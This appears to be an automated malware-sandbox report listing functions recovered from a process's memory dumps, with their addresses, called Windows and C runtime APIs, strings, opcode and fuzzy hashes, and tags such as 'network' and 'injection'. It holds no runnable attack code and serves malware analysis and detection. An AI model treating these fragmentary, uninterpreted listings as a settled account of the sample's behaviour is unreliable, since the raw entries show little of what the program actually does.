Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a7f8b0e90ab45a1c1729e8ee7c1b8c6bc854c34ae7261d8ac087302397721833
Instruction ID: 27401b2cc76c7c1c37b43715ac8bbdea4fa5089bcbc08cf7cb21602d35f13cc7
Opcode Fuzzy Hash: a7f8b0e90ab45a1c1729e8ee7c1b8c6bc854c34ae7261d8ac087302397721833
Instruction Fuzzy Hash: B051D57090426AAFCF00CFA8C888AAE7BB5EF45318F168555E91C9B251D731EA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00C21354, Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00C2137C
DName::DName.LIBVCRUNTIME ref: 00C213A9

Part of subcall function 00C1EB34: __aulldvrm.LIBCMT ref: 00C1EB65

DName::operator+.LIBCMT ref: 00C213C4
DName::DName.LIBVCRUNTIME ref: 00C213E1
DName::DName.LIBVCRUNTIME ref: 00C21411
DName::DName.LIBVCRUNTIME ref: 00C2141B
DName::DName.LIBVCRUNTIME ref: 00C21442

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: bd37f9697f8bb5808e0bb62cb2351de5e9869b2e774da32efce4c27f1d8f4341
Instruction ID: 32d6a2e2d92bbd7858cd93ad1bbb16542794fdb06b547f09824d47799f3d1443
Opcode Fuzzy Hash: bd37f9697f8bb5808e0bb62cb2351de5e9869b2e774da32efce4c27f1d8f4341
Instruction Fuzzy Hash: A4312871904324EACB08EFA8E841AEC7BB9FF26310F584149FC16A7A91D7345A85E720

Uniqueness

Uniqueness Score: -1.00%

Function 6D85655B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 6D8565B2
ext-ms-, xrefs: 6D8565C6

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e7b032880f7fe432763d534ae55be2d487fe9e2fb720b18beb251f611081c985
Instruction ID: 2ab68f8fb0ef82db94c449ddd3fd26274cc1e516633f0b326fb6f3abed4061c5
Opcode Fuzzy Hash: e7b032880f7fe432763d534ae55be2d487fe9e2fb720b18beb251f611081c985
Instruction Fuzzy Hash: CB210071D49215ABDF524A68CC4EB2E37746F02775F110960FD16AB280D731DD20C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D865281, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6D864FCD: _free.LIBCMT ref: 6D864FF2

_free.LIBCMT ref: 6D8652CF

Part of subcall function 6D855D5B: RtlFreeHeap.NTDLL(00000000,00000000,?,6D846800,?,00000000,?,6D838B9E,00000000,00000011,00000001), ref: 6D855D71
Part of subcall function 6D855D5B: GetLastError.KERNEL32(00000000,?,6D846800,?,00000000,?,6D838B9E,00000000,00000011,00000001), ref: 6D855D83

_free.LIBCMT ref: 6D8652DA
_free.LIBCMT ref: 6D8652E5
_free.LIBCMT ref: 6D865339
_free.LIBCMT ref: 6D865344
_free.LIBCMT ref: 6D86534F
_free.LIBCMT ref: 6D86535A

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 49924154ce928171af55a061a59c6c8176aba736179d8005691737b5974d190c
Instruction ID: e6179c456f2b9fc2f90947557f332c9dbdacc7718700bfae9fafd1246885b5ec
Opcode Fuzzy Hash: 49924154ce928171af55a061a59c6c8176aba736179d8005691737b5974d190c
Instruction Fuzzy Hash: EE11843258DB84E6D620AB78CC1DFDFF79C9F49718F420D29B39A660A0D764B5148760

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D337, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00C3D083: _free.LIBCMT ref: 00C3D0A8

_free.LIBCMT ref: 00C3D385

Part of subcall function 00C35F88: HeapFree.KERNEL32(00000000,00000000,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?), ref: 00C35F9E
Part of subcall function 00C35F88: GetLastError.KERNEL32(?,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?,?), ref: 00C35FB0

_free.LIBCMT ref: 00C3D390
_free.LIBCMT ref: 00C3D39B
_free.LIBCMT ref: 00C3D3EF
_free.LIBCMT ref: 00C3D3FA
_free.LIBCMT ref: 00C3D405
_free.LIBCMT ref: 00C3D410

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 966831b78ca923aff4bb80dcacd48b8c9b75351ddeac1eb365168dcaa10b9c14
Instruction ID: 6559c72c09df3245d5fbb45f0c4c71ee86ffc8e83c27264cb18e1b7f1a17920b
Opcode Fuzzy Hash: 966831b78ca923aff4bb80dcacd48b8c9b75351ddeac1eb365168dcaa10b9c14
Instruction Fuzzy Hash: 7F115B719A0B04FADA30BBB0DC07FCBB7DCAF54B00F404D25B29EA6092DA75B545A651

Uniqueness

Uniqueness Score: -1.00%

Function 00AC77C0, Relevance: 9.2, APIs: 6, Instructions: 180COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00AC78A7
Concurrency::cancel_current_task.LIBCPMT ref: 00AC78AC
Concurrency::cancel_current_task.LIBCPMT ref: 00AC78FA
Concurrency::cancel_current_task.LIBCPMT ref: 00AC78FF

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b284db1c2d4429053835201449596948e17d4174ddb3233c68d7e581404f6fac
Instruction ID: f9df85d0725838df96b0bd5d66d141779b96e17b07af47e1b07fb500f949f33e
Opcode Fuzzy Hash: b284db1c2d4429053835201449596948e17d4174ddb3233c68d7e581404f6fac
Instruction Fuzzy Hash: 5041F772A042108BCF14DF78D955B6D77A1EF51330B1A4B6DE926D7395EA30ED40CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A76F, Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,00000000,?,?,00DA8488), ref: 00C1A7B8
MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,00000000,?,?,00DA8488), ref: 00C1A823
LCMapStringEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00DA8488), ref: 00C1A840
LCMapStringEx.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00DA8488), ref: 00C1A87F
LCMapStringEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00DA8488), ref: 00C1A8DE
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,00DA8488), ref: 00C1A901

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 8c35270745c0c05db221ea29e452e369a97c896acc0ea98214601c31e3f8d1d2
Instruction ID: 734f4e435e5c93bb84fc6359c613b334cdf72b01ae57aa07f8deb0d45163407b
Opcode Fuzzy Hash: 8c35270745c0c05db221ea29e452e369a97c896acc0ea98214601c31e3f8d1d2
Instruction Fuzzy Hash: A851D07290120AAFEB205F61CC44FEE7BB9EF46750F154425F925E6190E730CED0ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D8560FF, Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D842A9E,6DA772C0,0000000C), ref: 6D856104
_free.LIBCMT ref: 6D856161
_free.LIBCMT ref: 6D856197
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6D842A9E,6DA772C0,0000000C), ref: 6D8561A2
_free.LIBCMT ref: 6D85620C
_free.LIBCMT ref: 6D856240

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: b4205b7426fbdceaa277b6a70f42cb0aeca69c5392c1124d11a49bb80a7c0147
Instruction ID: 3492eb086c265759bdc88f73ee6c7f86aec4cac463aee6e2cf1e12c7327bd46a
Opcode Fuzzy Hash: b4205b7426fbdceaa277b6a70f42cb0aeca69c5392c1124d11a49bb80a7c0147
Instruction Fuzzy Hash: 6431073269D2127BDBD2167C5C8EF3B626DEF83339B124E24FA219A5D1EB618C3101D0

Uniqueness

Uniqueness Score: -1.00%

Function 00C1D7C6, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C1D7BD,00C1B65B,00C18A1A,00DA8488,?,?,?,?,00C6A49A,000000FF,?,00A8D2A0,?), ref: 00C1D7D4
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C1D7E2
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C1D7FB
SetLastError.KERNEL32(00000000,?,00C1D7BD,00C1B65B,00C18A1A,00DA8488,?,?,?,?,00C6A49A,000000FF,?,00A8D2A0,?), ref: 00C1D84D

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7132c99d4dba374b62c02981328eba8c6e69913817644840f0aa7b95071a0d0c
Instruction ID: 4bc09e6702891a6e4ecb4979c6b9fdbcc592e4254d5dc6ac7b00cff1941a8ca0
Opcode Fuzzy Hash: 7132c99d4dba374b62c02981328eba8c6e69913817644840f0aa7b95071a0d0c
Instruction Fuzzy Hash: B9018432919721AEF62427B57CC96AB6B88EB43775720022EF922C55F1FF614C81F1D0

Uniqueness

Uniqueness Score: -1.00%

Function 00AA41E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00001F40), ref: 00AA430B
htonl.WS2_32 ref: 00AA4324
htonl.WS2_32(00000000), ref: 00AA432B
htons.WS2_32(00001F40), ref: 00AA433E

Strings

O', xrefs: 00AA427B

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: htonlhtons
String ID: O'
API String ID: 493294928-2469590110
Opcode ID: 54ae2685144b477d97871f28ce823207622ff319acb397d3bc01f35294ed165e
Instruction ID: 69d73936c7f9c99d36e68f34c58dc68d337197a3089c4ecb41582ab5ba2ab204
Opcode Fuzzy Hash: 54ae2685144b477d97871f28ce823207622ff319acb397d3bc01f35294ed165e
Instruction Fuzzy Hash: DB61CD71D00708DFDB20DF68D845B9AFBF4FB09310F00866AE85597391E7B5A988CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A3B0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(00DA8488), ref: 00A8A3DD
GetLastError.KERNEL32 ref: 00A8A3EA
TlsAlloc.KERNEL32(00DA8488,00000000,?,?), ref: 00A8A46D
GetLastError.KERNEL32(?,?), ref: 00A8A47A

Strings

tss, xrefs: 00A8A427, 00A8A4B7

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: 99b289bd5f7a0e518b58a96c9ae265ffe3a9c3a2ec09d2f331675e58b3039a54
Instruction ID: 33e288ed2d931c07d5ad8ee6666d0203a8ca2dcb2861c3597b558463c4812bea
Opcode Fuzzy Hash: 99b289bd5f7a0e518b58a96c9ae265ffe3a9c3a2ec09d2f331675e58b3039a54
Instruction Fuzzy Hash: BF31A571E04645DFCB10EFA9D90579EBBB8EB05720F10036AEC29E37D0EB7459489B92

Uniqueness

Uniqueness Score: -1.00%

Function 00C3398E, Relevance: 7.8, APIs: 5, Instructions: 255COMMON

Download Yara Rule

APIs

Part of subcall function 00C36300: GetLastError.KERNEL32(00000000,00000000,00000004,00C267A2,00000000,00000000,00000000,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C36305
Part of subcall function 00C36300: SetLastError.KERNEL32(00000000,00DA88A0,000000FF,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C363A3

_free.LIBCMT ref: 00C33C79
_free.LIBCMT ref: 00C33C92
_free.LIBCMT ref: 00C33CD0
_free.LIBCMT ref: 00C33CD9
_free.LIBCMT ref: 00C33CE5

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 4afd0d34059c8d000533a8f5d14c8474278ddf8b5c2bb76587b257f50d043800
Instruction ID: 52beeb40968fca037db4d68e21e9e9cf13f0d890c6469b753f9366f0e43acd1a
Opcode Fuzzy Hash: 4afd0d34059c8d000533a8f5d14c8474278ddf8b5c2bb76587b257f50d043800
Instruction Fuzzy Hash: 3DB14C75A116199FDB24DF18D885AADB7B5FF48304F5046AAE84AA7390E730AF90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00AD54A0, Relevance: 7.7, APIs: 5, Instructions: 238timeCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00AD558A
ReleaseSemaphore.KERNEL32(?,?,?,?,?,00A94F0B), ref: 00AD55B1
CloseHandle.KERNEL32(?), ref: 00AD55E5
SetEvent.KERNEL32(00000000), ref: 00AD56A3
SetWaitableTimer.KERNEL32(?,?,?,?,?,00000000,00DA8488), ref: 00AD5776

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ReleaseSemaphore$CloseEventHandleTimerWaitable
String ID:
API String ID: 765751747-0
Opcode ID: 3b3101b026e2bf50ca2926c6f9fd33ac60ed431e108d6e6042c66d47fa21fbab
Instruction ID: 9b570b46cfcfc5635c2e83f073f7a157e2d2db24726cb4797aa7747048636197
Opcode Fuzzy Hash: 3b3101b026e2bf50ca2926c6f9fd33ac60ed431e108d6e6042c66d47fa21fbab
Instruction Fuzzy Hash: E9819FB1E006059FDF25DF78D98475EBBA4AF09324F28055AE816EB392DB34DC40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2960, Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AB298D
std::_Lockit::_Lockit.LIBCPMT ref: 00AB29AD
std::_Lockit::~_Lockit.LIBCPMT ref: 00AB29CD
std::_Facet_Register.LIBCPMT ref: 00AB2A6B
std::_Lockit::~_Lockit.LIBCPMT ref: 00AB2A83

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 18afa515664b74d4db34ac4a93fb0d06cc1b194f9b25aa89f4c604067aa059e1
Instruction ID: 1ea860246a0fc5bb549387ad47f12607f8ebf92871b4a03f61436e07eb4f9687
Opcode Fuzzy Hash: 18afa515664b74d4db34ac4a93fb0d06cc1b194f9b25aa89f4c604067aa059e1
Instruction Fuzzy Hash: FF41D531900244DFCB24DF58C850BEABBB9EF14750F14416EE806AB392DB31AD45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A90FB0, Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?,?,?,?,00000000,?,?,00000000), ref: 00A9106D
RtlEnterCriticalSection.NTDLL(?), ref: 00A9107B
RtlLeaveCriticalSection.NTDLL(?), ref: 00A910A5

Part of subcall function 00A8E510: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00A8E536
Part of subcall function 00A8E510: RtlEnterCriticalSection.NTDLL(?), ref: 00A8E544
Part of subcall function 00A8E510: RtlLeaveCriticalSection.NTDLL(?), ref: 00A8E56E

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CriticalSection$CompletionEnterLeavePostQueuedStatus
String ID:
API String ID: 2946045947-0
Opcode ID: ef3d46a7445e68c16e31b8e024ddf552bd32b628ebea6d75aee785fa30b4f9fd
Instruction ID: 6877734c06a7a0d31c43af9b41ec84e1c3222e021e3c860222a7ff6a6c1c744c
Opcode Fuzzy Hash: ef3d46a7445e68c16e31b8e024ddf552bd32b628ebea6d75aee785fa30b4f9fd
Instruction Fuzzy Hash: 48319EB1204646EFDB208F15D884B9ABBE8FF04324F10851AF9168B690D7B6E994CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D864D56, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D864D6E

Part of subcall function 6D855D5B: RtlFreeHeap.NTDLL(00000000,00000000,?,6D846800,?,00000000,?,6D838B9E,00000000,00000011,00000001), ref: 6D855D71
Part of subcall function 6D855D5B: GetLastError.KERNEL32(00000000,?,6D846800,?,00000000,?,6D838B9E,00000000,00000011,00000001), ref: 6D855D83

_free.LIBCMT ref: 6D864D80
_free.LIBCMT ref: 6D864D92
_free.LIBCMT ref: 6D864DA4
_free.LIBCMT ref: 6D864DB6

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 29a1eb3463ef7454852f473a5dff5c1ff2bda32c3df3bcf5aa2e7c37d83daaed
Instruction ID: 216dbd326f6272994ac2f38e1695339e9643cccf282b37e637bd585beb56711a
Opcode Fuzzy Hash: 29a1eb3463ef7454852f473a5dff5c1ff2bda32c3df3bcf5aa2e7c37d83daaed
Instruction Fuzzy Hash: A4F0443390E784DBDA50DE5CE08CC3A37EEAA8AA253514D4DF52DD7500C770F88146A4

Uniqueness

Uniqueness Score: -1.00%

Function 00C3CE0C, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C3CE24

Part of subcall function 00C35F88: HeapFree.KERNEL32(00000000,00000000,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?), ref: 00C35F9E
Part of subcall function 00C35F88: GetLastError.KERNEL32(?,?,00C3D0AD,?,00000000,?,?,?,00C3D350,?,00000007,?,?,00C3D946,?,?), ref: 00C35FB0

_free.LIBCMT ref: 00C3CE36
_free.LIBCMT ref: 00C3CE48
_free.LIBCMT ref: 00C3CE5A
_free.LIBCMT ref: 00C3CE6C

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3191d83d9858899894838b8cafcd218e5c6ac8ca89b95d821446e81816999068
Instruction ID: 443ab3e3ac672def8dd5e49c48687050cf15c84147d1d4e0cdd8903987aea311
Opcode Fuzzy Hash: 3191d83d9858899894838b8cafcd218e5c6ac8ca89b95d821446e81816999068
Instruction Fuzzy Hash: E3F01232964714AFCA20EB98E9C1C1B77DDBA15711B940D05F859E7691CB30FD805764

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D930, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A8D94F
CloseHandle.KERNEL32(?), ref: 00A8D958
TerminateThread.KERNEL32(?,00000000), ref: 00A8D973
QueueUserAPC.KERNEL32(00A8D860,?,00000000), ref: 00A8D983
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A8D98E

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 3892215915-0
Opcode ID: 90fb33032affb907bed5361f7724fa91a1d9ec4c64770d4d197739c9d29d9f80
Instruction ID: 5831b47ac40bfe095b47b3b76029a37b49fba3e3adb8e54a3248ebd53d6a79f9
Opcode Fuzzy Hash: 90fb33032affb907bed5361f7724fa91a1d9ec4c64770d4d197739c9d29d9f80
Instruction Fuzzy Hash: 39F04971544605EBC7209BA9DD09B9ABBE8EB08721F104259F569D26E0DBB19C408B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A92750, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 00A8AD80: ___std_exception_copy.LIBVCRUNTIME ref: 00A8ADA8

Part of subcall function 00C1BCA3: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,00C18D50,?,00D82F38,?), ref: 00C1BD03

Concurrency::cancel_current_task.LIBCPMT ref: 00A92AF3

Strings

F, xrefs: 00A929F4
unknown [], xrefs: 00A92791
[], xrefs: 00A927CD

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Concurrency::cancel_current_taskExceptionRaise___std_exception_copy
String ID: []$F$unknown []
API String ID: 3394888853-1853650925
Opcode ID: 1ec512a40ee731b9c3da9b81332c3d6223e33de955968f5584fe5ebefd6d3974
Instruction ID: 6e26d002e11d746673cfb49166212081f8a7229e92695fe9a86b631f824a5c14
Opcode Fuzzy Hash: 1ec512a40ee731b9c3da9b81332c3d6223e33de955968f5584fe5ebefd6d3974
Instruction Fuzzy Hash: B5B1D371F00205AFDF18DFA4C985BAEB7B6EF85310F148129E815AB392DB74AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AAFCE0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00AAFEBA
RtlEnterCriticalSection.NTDLL(?), ref: 00AB0007
RtlLeaveCriticalSection.NTDLL(?), ref: 00AB002B

Strings

D, xrefs: 00AAFD95

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CriticalSection$Concurrency::cancel_current_taskEnterLeave
String ID: D
API String ID: 4224942163-2746444292
Opcode ID: e1a230dee0f291d7132135500c7ceec03420d7b576e4905259532fce29a2a9bb
Instruction ID: baca256c999b15c0eb5c50ab1bddc7b4cf5a1f819c3ce13aa17e16691dd0f632
Opcode Fuzzy Hash: e1a230dee0f291d7132135500c7ceec03420d7b576e4905259532fce29a2a9bb
Instruction Fuzzy Hash: 4AD167B0900709DFDB10DFA8C944B9EBBF4FF05314F108259E869AB291D7B5A949CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C3827E, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C38308

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 3d70a671d251961296ffff5f995b18bfdcba410acef1b5c6997b1f52bd380e0f
Instruction ID: de9f983a4f02fc868fc71b1862620e45b1ee2093ee77d11148d337ba0ae3737e
Opcode Fuzzy Hash: 3d70a671d251961296ffff5f995b18bfdcba410acef1b5c6997b1f52bd380e0f
Instruction Fuzzy Hash: 54B127729203469FEB11CF28C8917AEBBF5EF55340F148169F865AB342DA349E49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AA2900, Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 00AA29A1
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00AA2A00
SetEvent.KERNEL32(00000000), ref: 00AA2B52
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00AA2B7F

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorEvent
String ID:
API String ID: 3096193188-0
Opcode ID: ee25a83d0c3f3d734f5ddcb1f8b31fe5de711c0855ff3274a4398a533cfe60cc
Instruction ID: 75cd5cdc7d90fcda3055fe279f6b5e6b9614d91e2edfae23a14264b0f8a066e8
Opcode Fuzzy Hash: ee25a83d0c3f3d734f5ddcb1f8b31fe5de711c0855ff3274a4398a533cfe60cc
Instruction Fuzzy Hash: 6C810230A047489FDB21DF68C945BAEBBF4FF0A314F14415DE84AAB282DB74AD95C790

Uniqueness

Uniqueness Score: -1.00%

Function 00AA30C0, Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 00AA3161
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00AA31C0
SetEvent.KERNEL32(00000000,?,00000000), ref: 00AA32EF
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00AA331D

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false
